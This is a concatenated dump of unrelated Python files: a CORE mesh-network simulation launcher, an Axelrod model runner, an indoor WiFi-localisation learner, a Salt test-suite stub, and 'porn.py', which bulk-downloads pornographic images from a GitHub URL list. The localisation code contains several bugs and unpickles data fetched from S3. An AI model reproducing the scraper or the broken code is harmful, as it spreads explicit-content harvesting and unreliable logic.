    session.instantiate()
    # Timestamped report directory name: YYYY_M_D_H_M.
    simdir = str(time.localtime().tm_year) + "_" + str(time.localtime().tm_mon) + "_" + str(time.localtime().tm_mday) + "_" + str(time.localtime().tm_hour) + "_" + str(time.localtime().tm_min)
    # The sink is CORE node id 2 -- presumably id 1 is the WLAN node (TODO confirm).
    sink = session.get_node(2)
    motes[0].client.term_cmd("bash", "/opt/eagp_sim/run.sh", [str(sink.name) + ' sink ' + str(time_mul) + ' esp8266 ' + str(tmax) + ' ' + topofile + ' ' + str(node_options[0].x) + ' ' + str(node_options[0].y) + ' ' + protocol + ' adhoc ' + battery[0] + ' ' + str(simul_max)])
    # create the remaining (non-sink) motes with the same launcher script
    for i in range(1, len(motes)):
        mote = session.get_node(i + 2)
        motes[i].client.term_cmd("bash", "/opt/eagp_sim/run.sh", [str(mote.name) + ' mote ' + str(time_mul) + ' esp8266 ' + str(tmax) + ' ' + topofile + ' ' + str(node_options[i].x) + ' ' + str(node_options[i].y) + ' ' + protocol + ' adhoc ' + battery[i] + ' ' + str(simul_max)])
    time.sleep(5)  # wait for nodes to start and create socket
    # Common wall-clock start instant broadcast to every mote below.
    time_to_start = time.time() + 2
    # firing up the motes
    for i in range(0, len(motes)):
        mote = session.get_node(i + 2)
        try:
            s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            s.connect("/tmp/ouroboros.sock." + str(mote.name))
            s.send(str(time_to_start).encode())
            s.close()
        except:
            # Best-effort: a mote whose socket is unreachable is logged
            # and skipped rather than aborting the whole run.
            #pass
            traceback.print_exc()
    time.sleep(1)
    # Background server publishing the node snapshot over a Unix socket.
    t1 = threading.Thread(target=send_nodes)
    t1.start()  # starts socket
    #Rest = rest.Api(motes)
    path = "./reports/" + simdir + "/finished"
    logging.info("Checking for nodes finished in: " + path)
    Aux = Auxiliar(path, motes)
    lock = True
    counter = 0
    # Poll once per second until every mote reports finished; meanwhile
    # refresh the snapshot served by send_nodes().
    while lock == True:
        lock = Aux.check_finished()
        #if counter > 40: Aux.random_walk(motes)
        nodes_to_send = []
        for mote in motes:
            data = mote.data('node')
            nodes_to_send.append(data)
        nodes_to_send.append(radius)  # radius rides along as the last element
        counter += 1
        time.sleep(1)
    # shutdown session
    #Rest.shutdown()
    stop_thread()
    t1.join(timeout=1)
    #playsound.playsound('fim.mp3')
    coreemu.shutdown()
def send_nodes():
    """Serve the current node snapshot over a Unix socket until told to quit.

    Listens on /tmp/ouroboros/nodes.sock.  Protocol: a client sends 'get'
    to receive the JSON-encoded global `nodes_to_send`, or 'quit' to shut
    the server down.  Returns the last received raw message bytes.
    """
    global nodes_to_send
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    # Ensure the directory exists and remove any stale socket file.
    # FIX: the original did both in a single try block, so when the socket
    # file was absent os.remove raised first and os.mkdir was skipped,
    # making the subsequent bind() fail; guard each step separately.
    try:
        os.makedirs("/tmp/ouroboros/", exist_ok=True)
    except OSError:
        pass
    try:
        os.remove("/tmp/ouroboros/nodes.sock")
    except OSError:
        pass
    s.bind("/tmp/ouroboros/nodes.sock")
    s.listen(1)
    while True:
        conn, addr = s.accept()
        data = conn.recv(64)
        msg = data.decode()  # decode once instead of twice
        if msg == 'get':
            conn.send(json.dumps(nodes_to_send).encode())
        # FIX: always close the connection -- the original broke out of the
        # loop on 'quit' before conn.close(), leaking that connection.
        conn.close()
        if msg == 'quit':
            break
    s.close()
    return data
def stop_thread():
    """Signal the send_nodes() server to shut down by sending 'quit'."""
    client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    client.connect("/tmp/ouroboros/nodes.sock")
    client.send('quit'.encode())
    client.close()
if __name__ == "__main__":
    # CLI: <tmax> <protocol> <time_mul> <simul_max>; fall back to defaults
    # when arguments are missing or malformed.
    # FIX: catch only IndexError/ValueError -- the original bare `except`
    # also swallowed KeyboardInterrupt and SystemExit.
    try:
        tmax = sys.argv[1]
        protocol = sys.argv[2]
        time_mul = float(sys.argv[3])
        simul_max = int(sys.argv[4])
    except (IndexError, ValueError):
        tmax = 100
        protocol = 'eagp'
        time_mul = 1
        simul_max = 20000
    topology(tmax, protocol, time_mul, simul_max)
|
sim-axelrod-parallel.py | #!/usr/bin/env python
# Copyright (c) 2013. Mark E. Madsen <mark@madsenlab.org>
#
# This work is licensed under the terms of the Apache Software License, Version 2.0. See the file LICENSE for details.
"""
Description here
"""
import logging as log
import ming
import argparse
import time
import itertools
import copy
import os
import uuid
import pprint as pp
import multiprocessing as mp
import madsenlab.axelrod.utils as utils
import madsenlab.axelrod.data as data
import madsenlab.axelrod.rules as rules
def setup():
    """Parse CLI arguments, configure logging, and bind the Ming ODM to the
    experiment database.

    Populates the module globals `args` and `simconfig` used by the rest
    of this script.
    """
    global args, simconfig
    parser = argparse.ArgumentParser()
    parser.add_argument("--experiment", help="provide name for experiment", required=True)
    parser.add_argument("--debug", help="turn on debugging output")
    parser.add_argument("--dbhost", help="database hostname, defaults to localhost", default="localhost")
    parser.add_argument("--dbport", help="database port, defaults to 27017", default="27017")
    parser.add_argument("--configuration", help="Configuration file for experiment", required=True)
    parser.add_argument("--parallelism", help="Number of concurrent processes to run", default="4")
    parser.add_argument("--diagram", help="Draw a diagram when complete", default=False)
    args = parser.parse_args()
    simconfig = utils.AxelrodConfiguration(args.configuration)
    # --debug is compared against the literal string '1', not truthiness.
    if args.debug == '1':
        log.basicConfig(level=log.DEBUG, format='%(asctime)s %(levelname)s: %(message)s')
    else:
        log.basicConfig(level=log.INFO, format='%(asctime)s %(levelname)s: %(message)s')
    log.debug("experiment name: %s", args.experiment)
    # Route all model data to the per-experiment MongoDB database.
    data.set_experiment_name(args.experiment)
    data.set_database_hostname(args.dbhost)
    data.set_database_port(args.dbport)
    config = data.getMingConfiguration(data.modules)
    ming.configure(**config)
def main():
    """Start one producer process plus --parallelism worker processes and
    block until the joinable work queue drains (or the user hits ctrl-c).
    """
    global work_queue, process_list
    process_list = []
    work_queue = mp.JoinableQueue()
    structure_class_name = simconfig.POPULATION_STRUCTURE_CLASS
    log.info("Configuring Axelrod model with structure class: %s", structure_class_name)
    # Producer first, then a short grace period before consumers start.
    create_queueing_process(work_queue, queue_simulations)
    time.sleep(1)
    create_processes(work_queue, run_simulation_worker)
    try:
        # Blocks until every queued simconfig has been task_done()'d.
        work_queue.join()
    except KeyboardInterrupt:
        log.info("simulations interrupted by ctrl-c")
        for proc in process_list:
            proc.terminate()
        exit(1)
# End of main
def create_queueing_process(queue, worker):
    """Spawn a single daemon process running *worker*(queue, args) to fill
    the work queue; the process is tracked in the global process_list.
    """
    proc = mp.Process(target=worker, args=(queue, args))
    proc.daemon = True  # die with the parent on exit
    process_list.append(proc)
    proc.start()
def create_processes(queue, worker):
    """Spawn args.parallelism daemon consumer processes, each running
    *worker*(queue, args); all are tracked in the global process_list.
    """
    for _ in range(int(args.parallelism)):
        proc = mp.Process(target=worker, args=(queue, args))
        proc.daemon = True  # die with the parent on exit
        process_list.append(proc)
        proc.start()
def queue_simulations(queue, args):
    """Producer: enumerate the parameter state space from the configuration
    file and enqueue one deep-copied simconfig per replication.
    """
    basic_config = utils.AxelrodConfiguration(args.configuration)
    # The drift rule adds a fourth axis (drift rate) to the sweep.
    if basic_config.INTERACTION_RULE_CLASS == 'madsenlab.axelrod.rules.AxelrodDriftRule':
        state_space = [
            basic_config.POPULATION_SIZES_STUDIED,
            basic_config.NUMBER_OF_DIMENSIONS_OR_FEATURES,
            basic_config.NUMBER_OF_TRAITS_PER_DIMENSION,
            basic_config.DRIFT_RATES
        ]
    elif basic_config.INTERACTION_RULE_CLASS == 'madsenlab.axelrod.rules.AxelrodRule':
        state_space = [
            basic_config.POPULATION_SIZES_STUDIED,
            basic_config.NUMBER_OF_DIMENSIONS_OR_FEATURES,
            basic_config.NUMBER_OF_TRAITS_PER_DIMENSION,
        ]
    else:
        log.error("Unknown interaction rule class: %s", basic_config.INTERACTION_RULE_CLASS)
        exit(1)
    for param_combination in itertools.product(*state_space):
        # for each parameter combination, make a copy of the base configuration
        # set the specific param combo values, and queue the object
        for repl in range(0, basic_config.REPLICATIONS_PER_PARAM_SET):
            #log.debug("param combination: %s", param_combination)
            sc = copy.deepcopy(basic_config)
            sc.popsize = int(param_combination[0])
            sc.num_features = int(param_combination[1])
            sc.num_traits = int(param_combination[2])
            # Fourth element only present for the drift rule sweep.
            if len(param_combination) == 4:
                sc.drift_rate = float(param_combination[3])
            sc.sim_id = uuid.uuid4().urn
            sc.script = __file__
            sc.periodic = 0
            queue.put(sc)
    log.info("All simulation configurations queued")
def run_simulation_worker(queue, args):
    """Consumer: pull simconfig objects off the queue forever, run each
    Axelrod simulation until quiescence, and sample the final state.

    NOTE(review): queue.get() sits inside the try whose `finally` calls
    queue.task_done(); if get() itself ever raised, task_done() would run
    without a matching get.  There is also no `except` clause, so an error
    during a run propagates (after task_done) and kills this worker.
    NOTE(review): the log.info below always reads simconfig.drift_rate,
    which presumably only exists for drift-rule sweeps -- confirm.
    """
    # pull a simconfig object off the queue
    completed_count = 0
    while True:
        try:
            simconfig = queue.get()
            log.info("worker %s: starting run for popsize: %s numfeatures: %s numtraits: %s drift: %s",
                     os.getpid(), simconfig.popsize, simconfig.num_features, simconfig.num_traits,
                     simconfig.drift_rate)
            # Resolve the pluggable pieces named in the configuration.
            gf_constructor = utils.load_class(simconfig.NETWORK_FACTORY_CLASS)
            model_constructor = utils.load_class(simconfig.POPULATION_STRUCTURE_CLASS)
            rule_constructor = utils.load_class(simconfig.INTERACTION_RULE_CLASS)
            trait_factory_constructor = utils.load_class(simconfig.TRAIT_FACTORY_CLASS)
            trait_factory = trait_factory_constructor(simconfig)
            graph_factory = gf_constructor(simconfig)
            model = model_constructor(simconfig, graph_factory, trait_factory)
            model.initialize_population()
            ax = rule_constructor(model)
            timestep = 0
            last_interaction = 0
            # Step until an inactive tick triggers the liveness check.
            while(1):
                timestep += 1
                if timestep % 10 == 0:
                    log.debug("time: %s active links: %s", timestep, ax.get_fraction_links_active())
                ax.step(timestep)
                if model.get_time_last_interaction() != timestep:
                    live = utils.check_liveness(ax, model, args, simconfig, timestep)
                    if live == False:
                        utils.sample_axelrod_model(model, args, simconfig)
                        break
            # clean up before moving to next queue item
            simconfig = None
            model = None
            completed_count += 1
            if(completed_count % 100 == 0):
                log.info("trait worker %s: completed %s samples", os.getpid(), completed_count )
        finally:
            queue.task_done()
if __name__ == "__main__":
    # Configure logging/DB from CLI arguments, then run the parallel sweep.
    setup()
    main()
|
porn.py | import threading
import requests
from queue import Queue
from threading import Thread,Lock
import re
# Browser-like User-Agent so the remote servers serve the images normally.
headers = {
    'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'
}
# Serializes file writes (and the OK print) across downloader threads.
lock = Lock()
def get_pic(in_q):
    """Worker: drain image URLs from *in_q*, download each, and save it
    under porn/ with a name derived from the URL tail.

    Runs until the queue is observed empty.  OSError/IndexError during URL
    cleanup or file writing are silently ignored (original behavior);
    network errors from requests are not caught here, as before.
    """
    while not in_q.empty():
        try:
            url = in_q.get()
            # Fetch first (original order), then strip trailing "?<digits>"
            # query parts until the URL ends in .jpg for naming purposes.
            ress = requests.get(url, headers=headers)
            while url[-3:] != 'jpg':
                url = re.findall(r"(.*)\?\d+", url)[0]
            name = url[-21:]
            # FIX: use context managers so the lock and the file handle are
            # always released -- the original acquired the lock and opened
            # the file manually, so any exception in between left the lock
            # held forever (deadlocking all other workers) and leaked the
            # file descriptor.
            with lock:
                with open(f"porn/{name.replace('/', '_')}", "wb") as fp:
                    fp.write(ress.content)
                print("OK---------------------------------")
        except (OSError, IndexError):
            pass
        in_q.task_done()
print("开始--------")
# Master list of image URLs, fetched from GitHub.
ur = "https://raw.githubusercontent.com/vllbc/nsfw_data_scraper/master/raw_data/porn/urls_porn.txt"
res = requests.get(ur)
# Trim header/footer junk lines from the raw listing.
uu = res.text.strip().split("\n")[20:-18]
queues = Queue()
for url in uu:
    queues.put(url)
# 100 daemon downloader threads share the queue; join() blocks until every
# queued URL has been task_done()'d by get_pic().
for _ in range(100):
    thread = Thread(target=get_pic, args=(queues,))
    thread.daemon = True
    thread.start()
queues.join()
|
learn.py | #!/usr/bin/python3
import io
import csv
import json
import warnings
import pickle
import operator
import time
import logging
import math
import functools
import numpy
from sklearn.preprocessing import MinMaxScaler
from threading import Thread
from random import shuffle
from sklearn.neural_network import MLPClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis
from sklearn import cluster, mixture
from sklearn.neighbors import kneighbors_graph
from s3_helper import put_file, get_file
#Librerias locindoor
import os
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from tensorflow.keras.models import load_model
from core.data_processor import DataLoader
from core.model import Model
from core.trajectories import Trajectories
from core.aps import Aps
# Module-level 'learn' logger: DEBUG output to both learn.log and stderr,
# with a formatter that includes the function name.
logger = logging.getLogger('learn')
logger.setLevel(logging.DEBUG)
fh = logging.FileHandler('learn.log')
fh.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter(
    '%(asctime)s - [%(name)s/%(funcName)s] - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(ch)
def timeout(timeout):
    """Decorator factory: run the wrapped callable in a daemon thread and
    raise if it has not finished within *timeout* seconds.

    The worker thread is daemonic, so a call that overruns keeps running
    in the background; only the caller is unblocked with an exception.
    Exceptions raised by the wrapped function are re-raised in the caller.
    """
    def deco(func):
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            # Single-slot holder, pre-loaded with the timeout error so a
            # run that never finishes leaves something to raise.
            outcome = [Exception('function [%s] timeout [%s seconds] exceeded!' % (
                func.__name__, timeout))]
            def runner():
                try:
                    outcome[0] = func(*args, **kwargs)
                except Exception as exc:
                    outcome[0] = exc
            worker = Thread(target=runner)
            worker.daemon = True
            try:
                worker.start()
                worker.join(timeout)
            except Exception as join_err:
                raise join_err
            result = outcome[0]
            if isinstance(result, BaseException):
                raise result
            return result
        return wrapper
    return deco
class AI(object):
def __init__(self, family=None):
self.logger = logging.getLogger('learn.AI')
self.naming = {'from': {}, 'to': {}}
self.family = 'posifi'
#self.ai = AI()
#self.ai.learn("TrainM11.csv")
    def classify(self, sensor_data):
        """Classify a window of WiFi fingerprints into location zones.

        sensor_data: sequence shaped like
        [{"s": {sensorType: {mac: rssi, ...}}}, ...] -- presumably one
        entry per trajectory step (TODO confirm against the caller).
        Returns a payload dict with location names, per-algorithm
        predictions, and an is_unknown flag (True when no scanned AP
        matched a training AP).
        """
        #self.logger.debug(sensor_data)
        #header = self.header[1:]
        datos = pd.read_csv('TrainM11.csv')
        header = list(datos.columns[0:67])
        is_unknown = True
        lista_Ap = pd.read_csv("Listado_Aps12000.csv")
        step = len(sensor_data)
        # Filter out scanned APs that are not among the training APs.
        csv_data = numpy.zeros((step, len(header)))
        for huella in range(len(sensor_data)):
            for sensorType in sensor_data[huella]["s"]:
                for sensor in (sensor_data[huella]["s"][sensorType]):
                    # 'Ap300' is a sentinel for "MAC not in the listing";
                    # it is not in `header`, so unmatched APs are dropped.
                    sensorName = 'Ap300'
                    for j in range(len(lista_Ap)):
                        if (lista_Ap['MAC'][j] == sensor):
                            sensorName = lista_Ap['nºAp'][j]
                    if sensorName in header:
                        is_unknown = False
                        csv_data[huella][header.index(sensorName)] = sensor_data[huella]["s"][sensorType][sensor]
        self.headerClassify = header
        csv_dataClassify = csv_data
        payload = {'location_names': self.naming['to'], 'predictions': []}
        # Only the "LSTM" algorithm is actually run (single thread slot 0).
        threads = [None] * len(self.algorithms)
        self.results = [None] * len(self.algorithms)
        threads[0] = Thread(target=self.do_classification, args=(0, "LSTM", step, csv_dataClassify, header))
        threads[0].start()
        threads[0].join()
        for result in self.results:
            if result != None:
                payload['predictions'].append(result)
        payload['is_unknown'] = is_unknown
        return payload
def minmax_norm(self, df, maximo, minimo):
df_minmax_norm = (df - minimo) / (maximo - minimo)
return df_minmax_norm
    def normaliza(self, step, Train, datos, header):
        """Min-max normalize *datos* (a step x 67 fingerprint matrix) using
        per-column min/max taken from the training DataFrame *Train*.
        Columns absent from Train stay zero.

        NOTE(review): the assignment target `pasos_norm[:, step - j]` is
        suspicious -- for j > step the index goes negative and wraps to the
        end of the row; a plain `j` column index would be expected here.
        Verify the intended column mapping before relying on the output.
        """
        df = pd.DataFrame(datos)
        pasos_norm = numpy.zeros((step, 67))
        for j in range(len(header)):
            if header[j] in Train.columns:
                maximo = max(Train[header[j]])
                minimo = min(Train[header[j]])
                pasos_norm[:, step - j] = self.minmax_norm(df[j], maximo, minimo)
        return pasos_norm
def coord_zona(self, coord):
if (coord[1] < 2):
col = self.coordX(coord[0])
zona = col
if (coord[1] >= 2) and (coord[1] < 4):
col = self.coordX(coord[0])
zona = col +18
if (coord[1] >= 4) and (coord[1] < 6):
col = self.coordX(coord[0])
zona = col +36
if (coord[1] >= 6) and (coord[1] < 8):
col = self.coordX(coord[0])
zona = col +54
if (coord[1] >= 8) and (coord[1] < 10):
col = self.coordX(coord[0])
zona = col + 72
return zona
def coordX(self, X):
aux = 0
if X < 0:
col1 = 0
for i in range(18):
if (X >= aux) and (X < aux+2):
col1 = i
aux= aux +2
if X > 36:
col1 = 17
return col1
def do_classification(self, index, name,step,csv_dataClassify,header):
t = time.time()
pasos = np.empty([step,csv_dataClassify.shape[1]])
#self.logger.debug("dentro de do")
#self.logger.debug(pasos.shape)
try:
if name == "LSTM":
self.logger.debug("LSTM")
# for h in range(step):
# csv_dataClassify[h][csv_dataClassify[h] == 0] = -100
# huella = csv_dataClassify[h]
# huella = huella.reshape(67,1)
# min_max_scaler = MinMaxScaler()
# x_scaled = min_max_scaler.fit_transform(huella)
# huella = x_scaled.reshape(1,67)
# pasos[step-1-h] = huella
Huellas_Train = pd.read_csv('data/Huellas_sNorm.csv')
csv_dataClassify[csv_dataClassify == 0] = -100
pasos = self.normaliza(step,Huellas_Train,csv_dataClassify,header)
# self.logger.debug(pasos)
if (step == 15):
pasos = pasos.reshape(1,step,67)
model_new = load_model('DLRNN_M11.h5', compile = False)
pred1 = model_new.predict(pasos)
prediccion = pred1[1]
# self.logger.debug(prediccion)
# self.logger.debug(prediccion.shape)
# self.logger.debug(type(prediccion))
else:
#self.logger.debug("en el else")
pasos2 = np.empty([15,67])
for i in range(15):
pasos2[i] = pasos[0]
pasos2 = pasos2.reshape(1,15,67)
model_new= load_model.predict('DLRNN_M11.h5', compile = False)
pred1 = model_new(pasos2)
prediccion = pred1[1]
self.logger.debug("Prediciión en coordenadas")
self.logger.debug(prediccion)
pred_zona=np.zeros([prediccion.shape[0],prediccion.shape[1]])
for i in range(prediccion.shape[0]):
for j in range(prediccion.shape[1]):
zona = self.coord_zona(prediccion[i,j,:])
pred_zona[i,j] = zona
#self.logger.debug(type(pred1))
#self.logger.debug(type(prediccion))
#self.logger.debug(type(pred_zona))
prediction =pred_zona.tolist()
#self.logger.debug(type(prediction))
#self.logger.debug(prediction)
#self.logger.debug("predicciones en zona")
else:
prediction = self.algorithms[name].predict_proba(csv_dataClassify)
except Exception as e:
self.logger.debug("Entro a Except")
logger.error(csv_dataClassify)
logger.error(str(e))
return
predict = {}
if name == "LSTM":
#a = np.int(str(prediction[0][14]))
a = np.int(prediction[0][14]+1)
self.logger.debug("Predicción en Zona")
self.logger.debug(prediction[0][14]+1)
prediction = np.zeros([1,90])
for i in range(90):
if (a == i):
prediction[0,i] = 100
for i, pred in enumerate(prediction[0]):
predict[i] = pred
predict_payload = {'name': name,'locations': [], 'probabilities': []}
badValue = False
for tup in sorted(predict.items(), key=operator.itemgetter(1), reverse=True):
predict_payload['locations'].append(str(tup[0]))
predict_payload['probabilities'].append(round(float(tup[1]), 2))
if math.isnan(tup[1]):
badValue = True
break
if badValue:
return
self.results[index] = predict_payload
    @timeout(10)
    def train(self, clf, x, y):
        """Fit scikit-learn classifier *clf* on (x, y) and return it.

        The @timeout(10) decorator runs the fit in a daemon thread and
        raises if it takes longer than 10 seconds; note the fit thread
        itself keeps running in the background after a timeout.
        """
        return clf.fit(x, y)
    def trayecto(self, fname):  # generate the trajectories
        """Generate random training/test trajectories from collected
        fingerprints, per the settings in config.json.

        Returns (train3D_X, test3D_X, train3D_y, test3D_y) as 3-D arrays
        shaped (trajectory, step, feature) with the zone label as the
        last feature column split off into y.
        """
        configs = json.load(open('config.json', 'r'))
        # Aps class: reads the AP MAC file and builds the AP listing.
        Ap = Aps(os.path.join('data', configs['Aps']['listaAps']))
        lista_Aps = Ap.listadoF2(configs)
        # List the Antel-operated APs
        lista_antel = Ap.Aps_antel(lista_Aps, os.path.join('data', configs['Aps']['listaAntel']))
        # List the Fing APs
        lista_Fing = Ap.Aps_fing(lista_Aps, os.path.join('data', configs['Aps']['listaFing']))
        # Load and process the raw data
        data = DataLoader(fname)
        # Fingerprint matrix; which matrix flavor is chosen in config.
        datos = data.huellas(configs, lista_antel, lista_Aps)
        # Drop columns with little information (discard list / -85 floor).
        datos = data.filtro_Ap(datos, configs['Aps']['descartamos'], -85)
        # Keep one random fingerprint per zone
        datos_una_huella = data.una_huella_zona(datos)
        # Normalize RSSI values (zone labels keep their zone number).
        huellas_norm_df = data.normaliza(datos_una_huella)
        #datos.to_csv('datos.csv', index=False)
        # Each row of Trayectorias_aleatorias is one trajectory of T steps;
        # the count and length come from the configuration.
        trayectorias = Trajectories(configs)
        mapa = trayectorias.crear_mapa(configs)
        Trayectorias_aleatorias = trayectorias.generacion_trayectorias(configs['trajectory']['T'], configs['trajectory']['cantidad'], mapa)
        # 3-D matrix: every trajectory step gets a fingerprint attached.
        Matriz_Trayectorias_una_huella = trayectorias.trayectorias_con_una_huella(huellas_norm_df, Trayectorias_aleatorias)
        data_train, data_test = trayectorias.train_and_test(Matriz_Trayectorias_una_huella, configs['data']['train_test_split'])
        train3D_X, train3D_y = data_train[:, :, :-1], data_train[:, :, -1]
        test3D_X, test3D_y = data_test[:, :, :-1], data_test[:, :, -1]
        #trainY_coord3D = data.coordenadas(train3D_y)
        #testY_coord3D = data.coordenadas(test3D_y)
        return train3D_X, test3D_X, train3D_y, test3D_y
    def learn(self, fname):
        """Load the training CSV, build label/feature matrices, and train
        the configured classifiers (currently only the LSTM entry).

        NOTE(review): the LSTM branch references train3D_X / train3D_y,
        but the call that produces them (self.trayecto) is commented out
        below, so that branch raises NameError -- swallowed by the broad
        except and only logged.  The *fname* parameter is also immediately
        overwritten with a hard-coded filename.
        """
        self.logger.debug("ESTOY EN LA FUNCION LEARN")
        self.model = Model()
        t = time.time()
        configs = json.load(open('config.json', 'r'))
        # File containing the fingerprints to classify
        fname = "datos_final.csv"
        # Generate the trajectories and split into train and test
        #train3D_X, test3D_X, train3D_y, test3Y_y = self.trayecto(fname)
        self.header = []
        rows = []
        naming_num = 0
        with open('TrainM11.csv', 'r') as csvfile:
            reader = csv.reader(csvfile, delimiter=',')
            for i, row in enumerate(reader):
                #self.logger.debug(row)
                if i == 0:
                    self.header = row
                else:
                    for j, val in enumerate(row):
                        if j == len(row) - 1:
                            # this is a name of the location
                            if val not in self.naming['from']:
                                self.naming['from'][val] = naming_num
                                valor = str(int(float(val)))
                                #self.naming['to'][naming_num] = "location" + "_" + valor
                                self.naming['to'][naming_num] = valor
                                naming_num += 1
                            row[j] = self.naming['from'][val]
                            continue
                        if val == '':
                            row[j] = 0
                            continue
                        try:
                            row[j] = float(val)
                        except:
                            self.logger.error(
                                "problem parsing value " + str(val))
                    rows.append(row)
        # first column in row is the classification, Y
        y = numpy.zeros(len(rows))
        x = numpy.zeros((len(rows), len(rows[0]) - 1))
        # shuffle it up for training
        record_range = list(range(len(rows)))
        shuffle(record_range)
        for i in record_range:
            y[i] = rows[i][0]
            x[i, :] = numpy.array(rows[i][1:])
        names = [
            "LSTM"]
        #"Linear SVM"]
        classifiers = [
            self.model.model_clas(configs)]
        #SVC(kernel="linear", C=0.025, probability=True)]
        self.algorithms = {}
        for name, clf in zip(names, classifiers):
            t2 = time.time()
            self.logger.debug("learning {}".format(name))
            try:
                if name == "LSTM":
                    var = 0
                    self.algorithms[name] = self.model.train(train3D_X, train3D_y, epochs=2, batch_size=10, verbose=2, shuffle=True)
                    self.model.save()
                    # Replace the trained handle with a marker string.
                    self.algorithms[name] = 'LSTM'
                else:
                    self.algorithms[name] = self.train(clf, x, y)
                # self.logger.debug("learned {}, {:d} ms".format(name, int(1000 * (t2 - time.time()))))
            except Exception as e:
                self.logger.error("{} {}".format(name, str(e)))
        # NOTE(review): t - time.time() is negative; elapsed time should be
        # time.time() - t.
        self.logger.debug("{:d} ms".format(int(1000 * (t - time.time()))))
def save(self, save_file):
t = time.time()
save_data = {
'header': self.header,
'naming': self.naming,
'algorithms': self.algorithms,
'family': self.family
}
save_data = pickle.dumps(save_data)
put_file(f'ai_metadata/{save_file}', save_data)
self.logger.debug("{:d} ms".format(int(1000 * (t - time.time()))))
def load(self, save_file):
t = time.time()
downloaded_data = get_file(f'ai_metadata/{save_file}')
if not downloaded_data:
raise Exception('There is no AI data on S3')
saved_data = pickle.loads(downloaded_data)
self.header = saved_data['header']
self.naming = saved_data['naming']
self.algorithms = saved_data['algorithms']
self.family = saved_data['family']
self.logger.debug("{:d} ms".format(int(1000 * (t - time.time()))))
def do():
    """Ad-hoc clustering exploration over the AI's training data, printing
    overlap counts between true location groups and cluster assignments.

    NOTE(review): as written this cannot run end to end: ai.load() is
    missing its required save_file argument (TypeError), and the AI class
    never sets the `x`/`y` attributes read below (presumably left over
    from an older learn()).  numpy.int used in astype() was also removed
    in NumPy 1.24 (use int).  Preserved verbatim for review.
    """
    ai = AI()
    ai.load()
    # ai.learn()
    params = {'quantile': .3,
              'eps': .3,
              'damping': .9,
              'preference': -200,
              'n_neighbors': 10,
              'n_clusters': 3}
    bandwidth = cluster.estimate_bandwidth(ai.x, quantile=params['quantile'])
    connectivity = kneighbors_graph(
        ai.x, n_neighbors=params['n_neighbors'], include_self=False)
    # make connectivity symmetric
    connectivity = 0.5 * (connectivity + connectivity.T)
    # Candidate clustering algorithms, all configured from `params`.
    ms = cluster.MeanShift(bandwidth=bandwidth, bin_seeding=True)
    two_means = cluster.MiniBatchKMeans(n_clusters=params['n_clusters'])
    ward = cluster.AgglomerativeClustering(
        n_clusters=params['n_clusters'], linkage='ward',
        connectivity=connectivity)
    spectral = cluster.SpectralClustering(
        n_clusters=params['n_clusters'], eigen_solver='arpack',
        affinity="nearest_neighbors")
    dbscan = cluster.DBSCAN(eps=params['eps'])
    affinity_propagation = cluster.AffinityPropagation(
        damping=params['damping'], preference=params['preference'])
    average_linkage = cluster.AgglomerativeClustering(
        linkage="average", affinity="cityblock",
        n_clusters=params['n_clusters'], connectivity=connectivity)
    birch = cluster.Birch(n_clusters=params['n_clusters'])
    gmm = mixture.GaussianMixture(
        n_components=params['n_clusters'], covariance_type='full')
    clustering_algorithms = (
        ('MiniBatchKMeans', two_means),
        ('AffinityPropagation', affinity_propagation),
        ('MeanShift', ms),
        ('SpectralClustering', spectral),
        ('Ward', ward),
        ('AgglomerativeClustering', average_linkage),
        ('DBSCAN', dbscan),
        ('Birch', birch),
        ('GaussianMixture', gmm)
    )
    for name, algorithm in clustering_algorithms:
        # Silence the known benign warnings from the graph-based methods.
        with warnings.catch_warnings():
            warnings.filterwarnings(
                "ignore",
                message="the number of connected components of the " +
                "connectivity matrix is [0-9]{1,2}" +
                " > 1. Completing it to avoid stopping the tree early.",
                category=UserWarning)
            warnings.filterwarnings(
                "ignore",
                message="Graph is not fully connected, spectral embedding" +
                " may not work as expected.",
                category=UserWarning)
            try:
                algorithm.fit(ai.x)
            except Exception as e:
                continue
        if hasattr(algorithm, 'labels_'):
            y_pred = algorithm.labels_.astype(numpy.int)
        else:
            y_pred = algorithm.predict(ai.x)
        # Skip solutions with more than 4 clusters.
        if max(y_pred) > 3:
            continue
        # Group sample indices by their true label...
        known_groups = {}
        for i, group in enumerate(ai.y):
            group = int(group)
            if group not in known_groups:
                known_groups[group] = []
            known_groups[group].append(i)
        # ...and by their predicted cluster.
        guessed_groups = {}
        for i, group in enumerate(y_pred):
            if group not in guessed_groups:
                guessed_groups[group] = []
            guessed_groups[group].append(i)
        # Print the size of every (true group, cluster) intersection.
        for k in known_groups:
            for g in guessed_groups:
                print(
                    k, g, len(set(known_groups[k]).intersection(guessed_groups[g])))
|
__init__.py | '''
Set up the Salt integration test suite
'''
# Import Python libs
import optparse
import multiprocessing
import os
import sys
import shutil
import pprint
import tempfile
import logging
import time
import signal
import subprocess
from hashlib import md5
from subprocess import PIPE, Popen
from datetime import datetime, timedelta
try:
import pwd
except ImportError:
pass
# Import Salt libs
import salt
import salt.config
import salt.master
import salt.minion
import salt.runner
import salt.output
from salt.utils import fopen, get_colors
from salt.utils.verify import verify_env
from saltunittest import TestCase, RedirectStdStreams
# Determine terminal width for pretty printing; fall back to 70 columns
# when the optional `console` helper is unavailable (broad except kept).
try:
    import console
    width, height = console.getTerminalSize()
    PNUM = width
except:
    PNUM = 70
# Key directories for the integration test tree.
INTEGRATION_TEST_DIR = os.path.dirname(
    os.path.normpath(os.path.abspath(__file__))
)
CODE_DIR = os.path.dirname(os.path.dirname(INTEGRATION_TEST_DIR))
SCRIPT_DIR = os.path.join(CODE_DIR, 'scripts')
